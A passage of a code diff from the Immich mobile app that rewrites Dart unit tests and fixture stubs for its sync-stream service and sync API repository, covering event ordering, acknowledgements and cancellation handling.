.thenAnswer(successHandler);
|
|
||||||
when(() => mockSyncStreamRepo.updatePartnerV1(any()))
|
|
||||||
.thenAnswer(successHandler);
|
|
||||||
when(() => mockSyncStreamRepo.deletePartnerV1(any()))
|
|
||||||
.thenAnswer(successHandler);
|
|
||||||
});
|
});
|
||||||
|
|
||||||
tearDown(() async {
|
Future<void> simulateEvents(List<SyncEvent> events) async {
|
||||||
if (!streamController.isClosed) {
|
await sut.sync();
|
||||||
await streamController.close();
|
await handleEventsCallback(events, mockAbortCallbackWrapper.call);
|
||||||
}
|
|
||||||
});
|
|
||||||
|
|
||||||
// Helper to trigger sync and add events to the stream
|
|
||||||
Future<void> triggerSyncAndEmit(List<SyncEvent> events) async {
|
|
||||||
final future = sut.syncUsers(); // Start listening
|
|
||||||
await Future.delayed(Duration.zero); // Allow listener to attach
|
|
||||||
if (!streamController.isClosed) {
|
|
||||||
streamController.add(events);
|
|
||||||
await streamController.close(); // Close after emitting
|
|
||||||
}
|
|
||||||
await future; // Wait for processing to complete
|
|
||||||
}
|
}
|
||||||
|
|
||||||
group("SyncStreamService", () {
|
group("SyncStreamService - _handleEvents", () {
|
||||||
test(
|
test(
|
||||||
"completes successfully when stream emits data and handlers succeed",
|
"processes events and acks successfully when handlers succeed",
|
||||||
() async {
|
() async {
|
||||||
final events = [
|
final events = [
|
||||||
...SyncStreamStub.userEvents,
|
SyncStreamStub.userDeleteV1,
|
||||||
...SyncStreamStub.partnerEvents,
|
SyncStreamStub.userV1Admin,
|
||||||
|
SyncStreamStub.userV1User,
|
||||||
|
SyncStreamStub.partnerDeleteV1,
|
||||||
|
SyncStreamStub.partnerV1,
|
||||||
];
|
];
|
||||||
final future = triggerSyncAndEmit(events);
|
|
||||||
await expectLater(future, completes);
|
await simulateEvents(events);
|
||||||
// Verify ack includes last ack from each successfully handled type
|
|
||||||
verify(
|
verifyInOrder([
|
||||||
() =>
|
() => mockSyncStreamRepo.deleteUsersV1(any()),
|
||||||
mockSyncApiRepo.ack(any(that: containsAll(["5", "2", "4", "3"]))),
|
() => mockSyncApiRepo.ack(["2"]),
|
||||||
).called(1);
|
() => mockSyncStreamRepo.updateUsersV1(any()),
|
||||||
|
() => mockSyncApiRepo.ack(["5"]),
|
||||||
|
() => mockSyncStreamRepo.deletePartnerV1(any()),
|
||||||
|
() => mockSyncApiRepo.ack(["4"]),
|
||||||
|
() => mockSyncStreamRepo.updatePartnerV1(any()),
|
||||||
|
() => mockSyncApiRepo.ack(["3"]),
|
||||||
|
]);
|
||||||
|
verifyNever(() => mockAbortCallbackWrapper());
|
||||||
},
|
},
|
||||||
);
|
);
|
||||||
|
|
||||||
test("completes successfully when stream emits an error", () async {
|
test("processes final batch correctly", () async {
|
||||||
when(() => mockSyncApiRepo.getSyncEvents(any()))
|
final events = [
|
||||||
.thenAnswer((_) => Stream.error(Exception("Stream Error")));
|
SyncStreamStub.userDeleteV1,
|
||||||
// Should complete gracefully without throwing
|
SyncStreamStub.userV1Admin,
|
||||||
await expectLater(sut.syncUsers(), throwsException);
|
];
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any())); // No ack on stream error
|
|
||||||
|
await simulateEvents(events);
|
||||||
|
|
||||||
|
verifyInOrder([
|
||||||
|
() => mockSyncStreamRepo.deleteUsersV1(any()),
|
||||||
|
() => mockSyncApiRepo.ack(["2"]),
|
||||||
|
() => mockSyncStreamRepo.updateUsersV1(any()),
|
||||||
|
() => mockSyncApiRepo.ack(["1"]),
|
||||||
|
]);
|
||||||
|
verifyNever(() => mockAbortCallbackWrapper());
|
||||||
});
|
});
|
||||||
|
|
||||||
test("throws when initial getSyncEvents call fails", () async {
|
test("does not process or ack when event list is empty", () async {
|
||||||
final apiException = Exception("API Error");
|
await simulateEvents([]);
|
||||||
when(() => mockSyncApiRepo.getSyncEvents(any())).thenThrow(apiException);
|
|
||||||
// Should rethrow the exception from the initial call
|
|
||||||
await expectLater(sut.syncUsers(), throwsA(apiException));
|
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any()));
|
|
||||||
});
|
|
||||||
|
|
||||||
test(
|
|
||||||
"completes successfully when a repository handler throws an exception",
|
|
||||||
() async {
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any()))
|
|
||||||
.thenThrow(Exception("Repo Error"));
|
|
||||||
final events = [
|
|
||||||
...SyncStreamStub.userEvents,
|
|
||||||
...SyncStreamStub.partnerEvents,
|
|
||||||
];
|
|
||||||
// Should complete, but ack only for the successful types
|
|
||||||
await triggerSyncAndEmit(events);
|
|
||||||
// Only partner delete was successful by default setup
|
|
||||||
verify(() => mockSyncApiRepo.ack(["2", "4", "3"])).called(1);
|
|
||||||
},
|
|
||||||
);
|
|
||||||
|
|
||||||
test(
|
|
||||||
"completes successfully but sends no ack when all handlers fail",
|
|
||||||
() async {
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any()))
|
|
||||||
.thenAnswer(failureHandler);
|
|
||||||
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
|
||||||
.thenAnswer(failureHandler);
|
|
||||||
when(() => mockSyncStreamRepo.updatePartnerV1(any()))
|
|
||||||
.thenAnswer(failureHandler);
|
|
||||||
when(() => mockSyncStreamRepo.deletePartnerV1(any()))
|
|
||||||
.thenAnswer(failureHandler);
|
|
||||||
|
|
||||||
final events = [
|
|
||||||
...SyncStreamStub.userEvents,
|
|
||||||
...SyncStreamStub.partnerEvents,
|
|
||||||
];
|
|
||||||
await triggerSyncAndEmit(events);
|
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any()));
|
|
||||||
},
|
|
||||||
);
|
|
||||||
|
|
||||||
test("sends ack only for types where handler returns true", () async {
|
|
||||||
// Mock specific handlers: user update fails, user delete succeeds
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any()))
|
|
||||||
.thenAnswer(failureHandler);
|
|
||||||
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
|
||||||
.thenAnswer(successHandler);
|
|
||||||
// partner update fails, partner delete succeeds
|
|
||||||
when(() => mockSyncStreamRepo.updatePartnerV1(any()))
|
|
||||||
.thenAnswer(failureHandler);
|
|
||||||
|
|
||||||
final events = [
|
|
||||||
...SyncStreamStub.userEvents,
|
|
||||||
...SyncStreamStub.partnerEvents,
|
|
||||||
];
|
|
||||||
await triggerSyncAndEmit(events);
|
|
||||||
|
|
||||||
// Expect ack only for userDeleteV1 (ack: "2") and partnerDeleteV1 (ack: "4")
|
|
||||||
verify(() => mockSyncApiRepo.ack(any(that: containsAll(["2", "4"]))))
|
|
||||||
.called(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
test("does not process or ack when stream emits an empty list", () async {
|
|
||||||
final future = sut.syncUsers();
|
|
||||||
streamController.add([]); // Emit empty list
|
|
||||||
await streamController.close();
|
|
||||||
await future; // Wait for completion
|
|
||||||
|
|
||||||
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
||||||
verifyNever(() => mockSyncStreamRepo.deleteUsersV1(any()));
|
verifyNever(() => mockSyncStreamRepo.deleteUsersV1(any()));
|
||||||
verifyNever(() => mockSyncStreamRepo.updatePartnerV1(any()));
|
verifyNever(() => mockSyncStreamRepo.updatePartnerV1(any()));
|
||||||
verifyNever(() => mockSyncStreamRepo.deletePartnerV1(any()));
|
verifyNever(() => mockSyncStreamRepo.deletePartnerV1(any()));
|
||||||
|
verifyNever(() => mockAbortCallbackWrapper());
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any()));
|
verifyNever(() => mockSyncApiRepo.ack(any()));
|
||||||
});
|
});
|
||||||
|
|
||||||
test("processes multiple batches sequentially using mutex", () async {
|
test("aborts and stops processing if cancelled during iteration", () async {
|
||||||
final completer1 = Completer<void>();
|
|
||||||
final completer2 = Completer<void>();
|
|
||||||
int callOrder = 0;
|
|
||||||
int handler1StartOrder = -1;
|
|
||||||
int handler2StartOrder = -1;
|
|
||||||
int handler1Calls = 0;
|
|
||||||
int handler2Calls = 0;
|
|
||||||
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any())).thenAnswer((_) async {
|
|
||||||
handler1Calls++;
|
|
||||||
handler1StartOrder = ++callOrder;
|
|
||||||
await completer1.future;
|
|
||||||
return true;
|
|
||||||
});
|
|
||||||
when(() => mockSyncStreamRepo.updatePartnerV1(any()))
|
|
||||||
.thenAnswer((_) async {
|
|
||||||
handler2Calls++;
|
|
||||||
handler2StartOrder = ++callOrder;
|
|
||||||
await completer2.future;
|
|
||||||
return true;
|
|
||||||
});
|
|
||||||
|
|
||||||
final batch1 = SyncStreamStub.userEvents;
|
|
||||||
final batch2 = SyncStreamStub.partnerEvents;
|
|
||||||
|
|
||||||
final syncFuture = sut.syncUsers();
|
|
||||||
await pumpEventQueue();
|
|
||||||
|
|
||||||
streamController.add(batch1);
|
|
||||||
await pumpEventQueue();
|
|
||||||
// Small delay to ensure the first handler starts
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
expect(handler1StartOrder, 1, reason: "Handler 1 should start first");
|
|
||||||
expect(handler1Calls, 1);
|
|
||||||
|
|
||||||
streamController.add(batch2);
|
|
||||||
await pumpEventQueue();
|
|
||||||
// Small delay
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
expect(handler2StartOrder, -1, reason: "Handler 2 should wait");
|
|
||||||
expect(handler2Calls, 0);
|
|
||||||
|
|
||||||
completer1.complete();
|
|
||||||
await pumpEventQueue(times: 40);
|
|
||||||
// Small delay to ensure the second handler starts
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
expect(handler2StartOrder, 2, reason: "Handler 2 should start after H1");
|
|
||||||
expect(handler2Calls, 1);
|
|
||||||
|
|
||||||
completer2.complete();
|
|
||||||
await pumpEventQueue(times: 40);
|
|
||||||
// Small delay before closing the stream
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
if (!streamController.isClosed) {
|
|
||||||
await streamController.close();
|
|
||||||
}
|
|
||||||
await pumpEventQueue(times: 40);
|
|
||||||
// Small delay to ensure the sync completes
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
await syncFuture;
|
|
||||||
|
|
||||||
verify(() => mockSyncStreamRepo.updateUsersV1(any())).called(1);
|
|
||||||
verify(() => mockSyncStreamRepo.updatePartnerV1(any())).called(1);
|
|
||||||
verify(() => mockSyncApiRepo.ack(any())).called(2);
|
|
||||||
});
|
|
||||||
|
|
||||||
test(
|
|
||||||
"stops processing and ack when cancel checker is completed",
|
|
||||||
() async {
|
|
||||||
final cancellationChecker = _MockCancellationWrapper();
|
final cancellationChecker = _MockCancellationWrapper();
|
||||||
when(() => cancellationChecker.isCancelled()).thenAnswer((_) => false);
|
when(() => cancellationChecker()).thenReturn(false);
|
||||||
|
|
||||||
sut = SyncStreamService(
|
sut = SyncStreamService(
|
||||||
syncApiRepository: mockSyncApiRepo,
|
syncApiRepository: mockSyncApiRepo,
|
||||||
syncStreamRepository: mockSyncStreamRepo,
|
syncStreamRepository: mockSyncStreamRepo,
|
||||||
cancelChecker: cancellationChecker.isCancelled,
|
cancelChecker: cancellationChecker.call,
|
||||||
);
|
);
|
||||||
|
await sut.sync();
|
||||||
|
|
||||||
|
final events = [
|
||||||
|
SyncStreamStub.userDeleteV1,
|
||||||
|
SyncStreamStub.userV1Admin,
|
||||||
|
SyncStreamStub.partnerDeleteV1,
|
||||||
|
];
|
||||||
|
|
||||||
|
when(() => mockSyncStreamRepo.deleteUsersV1(any())).thenAnswer((_) async {
|
||||||
|
when(() => cancellationChecker()).thenReturn(true);
|
||||||
|
});
|
||||||
|
|
||||||
|
await handleEventsCallback(events, mockAbortCallbackWrapper.call);
|
||||||
|
|
||||||
|
verify(() => mockSyncStreamRepo.deleteUsersV1(any())).called(1);
|
||||||
|
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
||||||
|
verifyNever(() => mockSyncStreamRepo.deletePartnerV1(any()));
|
||||||
|
|
||||||
|
verify(() => mockAbortCallbackWrapper()).called(1);
|
||||||
|
|
||||||
|
verify(() => mockSyncApiRepo.ack(["2"])).called(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
test(
|
||||||
|
"aborts and stops processing if cancelled before processing batch",
|
||||||
|
() async {
|
||||||
|
final cancellationChecker = _MockCancellationWrapper();
|
||||||
|
when(() => cancellationChecker()).thenReturn(false);
|
||||||
|
|
||||||
final processingCompleter = Completer<void>();
|
final processingCompleter = Completer<void>();
|
||||||
bool handlerStarted = false;
|
bool handler1Started = false;
|
||||||
|
|
||||||
// Make handler wait so we can cancel it mid-flight
|
|
||||||
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
||||||
.thenAnswer((_) async {
|
.thenAnswer((_) async {
|
||||||
handlerStarted = true;
|
handler1Started = true;
|
||||||
await processingCompleter
|
return processingCompleter.future;
|
||||||
.future; // Wait indefinitely until test completes it
|
|
||||||
return true;
|
|
||||||
});
|
});
|
||||||
|
|
||||||
final syncFuture = sut.syncUsers();
|
sut = SyncStreamService(
|
||||||
await pumpEventQueue(times: 30);
|
syncApiRepository: mockSyncApiRepo,
|
||||||
|
syncStreamRepository: mockSyncStreamRepo,
|
||||||
streamController.add(SyncStreamStub.userEvents);
|
cancelChecker: cancellationChecker.call,
|
||||||
// Ensure processing starts
|
|
||||||
await Future.delayed(const Duration(milliseconds: 10));
|
|
||||||
|
|
||||||
expect(handlerStarted, isTrue, reason: "Handler should have started");
|
|
||||||
|
|
||||||
when(() => cancellationChecker.isCancelled()).thenAnswer((_) => true);
|
|
||||||
|
|
||||||
// Allow cancellation logic to propagate
|
|
||||||
await Future.delayed(const Duration(milliseconds: 10));
|
|
||||||
|
|
||||||
// Complete the handler's completer after cancellation signal
|
|
||||||
// to ensure the cancellation logic itself isn't blocked by the handler.
|
|
||||||
processingCompleter.complete();
|
|
||||||
|
|
||||||
await expectLater(syncFuture, throwsA(isA<CanceledError>()));
|
|
||||||
|
|
||||||
// Verify that ack was NOT called because processing was cancelled
|
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any()));
|
|
||||||
},
|
|
||||||
);
|
);
|
||||||
|
|
||||||
test("completes successfully when ack call throws an exception", () async {
|
await sut.sync();
|
||||||
when(() => mockSyncApiRepo.ack(any())).thenThrow(Exception("Ack Error"));
|
|
||||||
final events = [
|
final events = [
|
||||||
...SyncStreamStub.userEvents,
|
SyncStreamStub.userDeleteV1,
|
||||||
...SyncStreamStub.partnerEvents,
|
SyncStreamStub.userV1Admin,
|
||||||
|
SyncStreamStub.partnerDeleteV1,
|
||||||
];
|
];
|
||||||
|
|
||||||
// Should still complete even if ack fails
|
final processingFuture =
|
||||||
await triggerSyncAndEmit(events);
|
handleEventsCallback(events, mockAbortCallbackWrapper.call);
|
||||||
verify(() => mockSyncApiRepo.ack(any()))
|
|
||||||
.called(1); // Verify ack was attempted
|
|
||||||
});
|
|
||||||
|
|
||||||
test("waits for processing to finish if onDone called early", () async {
|
|
||||||
final processingCompleter = Completer<void>();
|
|
||||||
bool handlerFinished = false;
|
|
||||||
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any())).thenAnswer((_) async {
|
|
||||||
await processingCompleter.future; // Wait inside handler
|
|
||||||
handlerFinished = true;
|
|
||||||
return true;
|
|
||||||
});
|
|
||||||
|
|
||||||
final syncFuture = sut.syncUsers();
|
|
||||||
// Allow listener to attach
|
|
||||||
// This is necessary to ensure the stream is ready to receive events
|
|
||||||
await Future.delayed(Duration.zero);
|
|
||||||
|
|
||||||
streamController.add(SyncStreamStub.userEvents); // Emit batch
|
|
||||||
await Future.delayed(
|
|
||||||
const Duration(milliseconds: 10),
|
|
||||||
); // Ensure processing starts
|
|
||||||
|
|
||||||
await streamController
|
|
||||||
.close(); // Close stream (triggers onDone internally)
|
|
||||||
await Future.delayed(
|
|
||||||
const Duration(milliseconds: 10),
|
|
||||||
); // Give onDone a chance to fire
|
|
||||||
|
|
||||||
// At this point, onDone was called, but processing is blocked
|
|
||||||
expect(handlerFinished, isFalse);
|
|
||||||
|
|
||||||
processingCompleter.complete(); // Allow processing to finish
|
|
||||||
await syncFuture; // Now the main future should complete
|
|
||||||
|
|
||||||
expect(handlerFinished, isTrue);
|
|
||||||
verify(() => mockSyncApiRepo.ack(any())).called(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
test("processes events in the defined _kSyncTypeOrder", () async {
|
|
||||||
final future = sut.syncUsers();
|
|
||||||
await pumpEventQueue();
|
await pumpEventQueue();
|
||||||
if (!streamController.isClosed) {
|
|
||||||
final events = [
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.partnerV1,
|
|
||||||
data: SyncStreamStub.partnerV1,
|
|
||||||
ack: "1",
|
|
||||||
), // Should be processed last
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.userV1,
|
|
||||||
data: SyncStreamStub.userV1Admin,
|
|
||||||
ack: "2",
|
|
||||||
), // Should be processed second
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.partnerDeleteV1,
|
|
||||||
data: SyncStreamStub.partnerDeleteV1,
|
|
||||||
ack: "3",
|
|
||||||
), // Should be processed third
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.userDeleteV1,
|
|
||||||
data: SyncStreamStub.userDeleteV1,
|
|
||||||
ack: "4",
|
|
||||||
), // Should be processed first
|
|
||||||
];
|
|
||||||
|
|
||||||
streamController.add(events);
|
expect(handler1Started, isTrue);
|
||||||
await streamController.close();
|
|
||||||
}
|
|
||||||
await future;
|
|
||||||
|
|
||||||
verifyInOrder([
|
// Signal cancellation while handler 1 is waiting
|
||||||
() => mockSyncStreamRepo.deleteUsersV1(any()),
|
when(() => cancellationChecker()).thenReturn(true);
|
||||||
() => mockSyncStreamRepo.updateUsersV1(any()),
|
await pumpEventQueue();
|
||||||
() => mockSyncStreamRepo.deletePartnerV1(any()),
|
|
||||||
() => mockSyncStreamRepo.updatePartnerV1(any()),
|
|
||||||
// Verify ack happens after all processing
|
|
||||||
() => mockSyncApiRepo.ack(any()),
|
|
||||||
]);
|
|
||||||
});
|
|
||||||
});
|
|
||||||
|
|
||||||
group("syncUsers", () {
|
processingCompleter.complete();
|
||||||
test("calls getSyncEvents with correct types", () async {
|
await processingFuture;
|
||||||
// Need to close the stream for the future to complete
|
|
||||||
final future = sut.syncUsers();
|
|
||||||
await streamController.close();
|
|
||||||
await future;
|
|
||||||
|
|
||||||
verify(
|
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
||||||
() => mockSyncApiRepo.getSyncEvents([
|
|
||||||
SyncRequestType.usersV1,
|
|
||||||
SyncRequestType.partnersV1,
|
|
||||||
]),
|
|
||||||
).called(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
test("calls repository methods with correctly grouped data", () async {
|
verify(() => mockSyncApiRepo.ack(["2"])).called(1);
|
||||||
final events = [
|
},
|
||||||
...SyncStreamStub.userEvents,
|
);
|
||||||
...SyncStreamStub.partnerEvents,
|
|
||||||
];
|
|
||||||
await triggerSyncAndEmit(events);
|
|
||||||
|
|
||||||
// Verify each handler was called with the correct list of data payloads
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo.updateUsersV1(
|
|
||||||
[SyncStreamStub.userV1Admin, SyncStreamStub.userV1User],
|
|
||||||
),
|
|
||||||
).called(1);
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo.deleteUsersV1([SyncStreamStub.userDeleteV1]),
|
|
||||||
).called(1);
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo.updatePartnerV1([SyncStreamStub.partnerV1]),
|
|
||||||
).called(1);
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo
|
|
||||||
.deletePartnerV1([SyncStreamStub.partnerDeleteV1]),
|
|
||||||
).called(1);
|
|
||||||
});
|
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
52
mobile/test/fixtures/sync_stream.stub.dart
vendored
52
mobile/test/fixtures/sync_stream.stub.dart
vendored
@ -2,44 +2,44 @@ import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
|||||||
import 'package:openapi/api.dart';
|
import 'package:openapi/api.dart';
|
||||||
|
|
||||||
abstract final class SyncStreamStub {
|
abstract final class SyncStreamStub {
|
||||||
static final userV1Admin = SyncUserV1(
|
static final userV1Admin = SyncEvent(
|
||||||
|
type: SyncEntityType.userV1,
|
||||||
|
data: SyncUserV1(
|
||||||
deletedAt: DateTime(2020),
|
deletedAt: DateTime(2020),
|
||||||
email: "admin@admin",
|
email: "admin@admin",
|
||||||
id: "1",
|
id: "1",
|
||||||
name: "Admin",
|
name: "Admin",
|
||||||
|
),
|
||||||
|
ack: "1",
|
||||||
);
|
);
|
||||||
static final userV1User = SyncUserV1(
|
static final userV1User = SyncEvent(
|
||||||
|
type: SyncEntityType.userV1,
|
||||||
|
data: SyncUserV1(
|
||||||
deletedAt: DateTime(2021),
|
deletedAt: DateTime(2021),
|
||||||
email: "user@user",
|
email: "user@user",
|
||||||
id: "2",
|
id: "5",
|
||||||
name: "User",
|
name: "User",
|
||||||
);
|
|
||||||
static final userDeleteV1 = SyncUserDeleteV1(userId: "2");
|
|
||||||
static final userEvents = [
|
|
||||||
SyncEvent(type: SyncEntityType.userV1, data: userV1Admin, ack: "1"),
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.userDeleteV1,
|
|
||||||
data: userDeleteV1,
|
|
||||||
ack: "2",
|
|
||||||
),
|
),
|
||||||
SyncEvent(type: SyncEntityType.userV1, data: userV1User, ack: "5"),
|
ack: "5",
|
||||||
];
|
);
|
||||||
|
static final userDeleteV1 = SyncEvent(
|
||||||
|
type: SyncEntityType.userDeleteV1,
|
||||||
|
data: SyncUserDeleteV1(userId: "2"),
|
||||||
|
ack: "2",
|
||||||
|
);
|
||||||
|
|
||||||
static final partnerV1 = SyncPartnerV1(
|
static final partnerV1 = SyncEvent(
|
||||||
|
type: SyncEntityType.partnerV1,
|
||||||
|
data: SyncPartnerV1(
|
||||||
inTimeline: true,
|
inTimeline: true,
|
||||||
sharedById: "1",
|
sharedById: "1",
|
||||||
sharedWithId: "2",
|
sharedWithId: "2",
|
||||||
);
|
|
||||||
static final partnerDeleteV1 = SyncPartnerDeleteV1(
|
|
||||||
sharedById: "3",
|
|
||||||
sharedWithId: "4",
|
|
||||||
);
|
|
||||||
static final partnerEvents = [
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.partnerDeleteV1,
|
|
||||||
data: partnerDeleteV1,
|
|
||||||
ack: "4",
|
|
||||||
),
|
),
|
||||||
SyncEvent(type: SyncEntityType.partnerV1, data: partnerV1, ack: "3"),
|
ack: "3",
|
||||||
];
|
);
|
||||||
|
static final partnerDeleteV1 = SyncEvent(
|
||||||
|
type: SyncEntityType.partnerDeleteV1,
|
||||||
|
data: SyncPartnerDeleteV1(sharedById: "3", sharedWithId: "4"),
|
||||||
|
ack: "4",
|
||||||
|
);
|
||||||
}
|
}
|
||||||
|
@ -0,0 +1,299 @@
|
|||||||
|
import 'dart:async';
|
||||||
|
import 'dart:convert';
|
||||||
|
|
||||||
|
import 'package:flutter_test/flutter_test.dart';
|
||||||
|
import 'package:http/http.dart' as http;
|
||||||
|
import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
||||||
|
import 'package:immich_mobile/infrastructure/repositories/sync_api.repository.dart';
|
||||||
|
import 'package:mocktail/mocktail.dart';
|
||||||
|
import 'package:openapi/api.dart';
|
||||||
|
|
||||||
|
import '../../api.mocks.dart';
|
||||||
|
import '../../service.mocks.dart';
|
||||||
|
|
||||||
|
class MockHttpClient extends Mock implements http.Client {}
|
||||||
|
|
||||||
|
class MockApiClient extends Mock implements ApiClient {}
|
||||||
|
|
||||||
|
class MockStreamedResponse extends Mock implements http.StreamedResponse {}
|
||||||
|
|
||||||
|
class FakeBaseRequest extends Fake implements http.BaseRequest {}
|
||||||
|
|
||||||
|
String _createJsonLine(String type, Map<String, dynamic> data, String ack) {
|
||||||
|
return '${jsonEncode({'type': type, 'data': data, 'ack': ack})}\n';
|
||||||
|
}
|
||||||
|
|
||||||
|
void main() {
|
||||||
|
late SyncApiRepository sut;
|
||||||
|
late MockApiService mockApiService;
|
||||||
|
late MockApiClient mockApiClient;
|
||||||
|
late MockSyncApi mockSyncApi;
|
||||||
|
late MockHttpClient mockHttpClient;
|
||||||
|
late MockStreamedResponse mockStreamedResponse;
|
||||||
|
late StreamController<List<int>> responseStreamController;
|
||||||
|
late int testBatchSize = 3;
|
||||||
|
|
||||||
|
setUp(() {
|
||||||
|
mockApiService = MockApiService();
|
||||||
|
mockApiClient = MockApiClient();
|
||||||
|
mockSyncApi = MockSyncApi();
|
||||||
|
mockHttpClient = MockHttpClient();
|
||||||
|
mockStreamedResponse = MockStreamedResponse();
|
||||||
|
responseStreamController =
|
||||||
|
StreamController<List<int>>.broadcast(sync: true);
|
||||||
|
|
||||||
|
registerFallbackValue(FakeBaseRequest());
|
||||||
|
|
||||||
|
when(() => mockApiService.apiClient).thenReturn(mockApiClient);
|
||||||
|
when(() => mockApiService.syncApi).thenReturn(mockSyncApi);
|
||||||
|
when(() => mockApiClient.basePath).thenReturn('http://demo.immich.app/api');
|
||||||
|
when(() => mockApiService.applyToParams(any(), any()))
|
||||||
|
.thenAnswer((_) async => {});
|
||||||
|
|
||||||
|
// Mock HTTP client behavior
|
||||||
|
when(() => mockHttpClient.send(any()))
|
||||||
|
.thenAnswer((_) async => mockStreamedResponse);
|
||||||
|
when(() => mockStreamedResponse.statusCode).thenReturn(200);
|
||||||
|
when(() => mockStreamedResponse.stream)
|
||||||
|
.thenAnswer((_) => http.ByteStream(responseStreamController.stream));
|
||||||
|
when(() => mockHttpClient.close()).thenAnswer((_) => {});
|
||||||
|
|
||||||
|
sut = SyncApiRepository(mockApiService);
|
||||||
|
});
|
||||||
|
|
||||||
|
tearDown(() async {
|
||||||
|
if (!responseStreamController.isClosed) {
|
||||||
|
await responseStreamController.close();
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
Future<void> streamChanges(
|
||||||
|
Function(List<SyncEvent>, Function() abort) onDataCallback,
|
||||||
|
) {
|
||||||
|
return sut.streamChanges(
|
||||||
|
onDataCallback,
|
||||||
|
batchSize: testBatchSize,
|
||||||
|
httpClient: mockHttpClient,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
test('streamChanges stops processing stream when abort is called', () async {
|
||||||
|
int onDataCallCount = 0;
|
||||||
|
bool abortWasCalledInCallback = false;
|
||||||
|
List<SyncEvent> receivedEventsBatch1 = [];
|
||||||
|
|
||||||
|
onDataCallback(List<SyncEvent> events, Function() abort) {
|
||||||
|
onDataCallCount++;
|
||||||
|
if (onDataCallCount == 1) {
|
||||||
|
receivedEventsBatch1 = events;
|
||||||
|
abort();
|
||||||
|
abortWasCalledInCallback = true;
|
||||||
|
} else {
|
||||||
|
fail("onData called more than once after abort was invoked");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
final streamChangesFuture = streamChanges(onDataCallback);
|
||||||
|
|
||||||
|
await pumpEventQueue();
|
||||||
|
|
||||||
|
for (int i = 0; i < testBatchSize; i++) {
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user$i").toJson(),
|
||||||
|
'ack$i',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
for (int i = testBatchSize; i < testBatchSize * 2; i++) {
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user$i").toJson(),
|
||||||
|
'ack$i',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
await responseStreamController.close();
|
||||||
|
await expectLater(streamChangesFuture, completes);
|
||||||
|
|
||||||
|
expect(onDataCallCount, 1);
|
||||||
|
expect(abortWasCalledInCallback, isTrue);
|
||||||
|
expect(receivedEventsBatch1.length, testBatchSize);
|
||||||
|
verify(() => mockHttpClient.close()).called(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
test(
|
||||||
|
'streamChanges does not process remaining lines in finally block if aborted',
|
||||||
|
() async {
|
||||||
|
int onDataCallCount = 0;
|
||||||
|
bool abortWasCalledInCallback = false;
|
||||||
|
|
||||||
|
onDataCallback(List<SyncEvent> events, Function() abort) {
|
||||||
|
onDataCallCount++;
|
||||||
|
if (onDataCallCount == 1) {
|
||||||
|
abort();
|
||||||
|
abortWasCalledInCallback = true;
|
||||||
|
} else {
|
||||||
|
fail("onData called more than once after abort was invoked");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
final streamChangesFuture = streamChanges(onDataCallback);
|
||||||
|
|
||||||
|
await pumpEventQueue();
|
||||||
|
|
||||||
|
for (int i = 0; i < testBatchSize; i++) {
|
||||||
|
responseStreamController.add(
|
||||||
|
utf8.encode(
|
||||||
|
_createJsonLine(
|
||||||
|
SyncEntityType.userDeleteV1.toString(),
|
||||||
|
SyncUserDeleteV1(userId: "user$i").toJson(),
|
||||||
|
'ack$i',
|
||||||
|
),
|
||||||
|
),
|
||||||
|
);
|
||||||
|
}
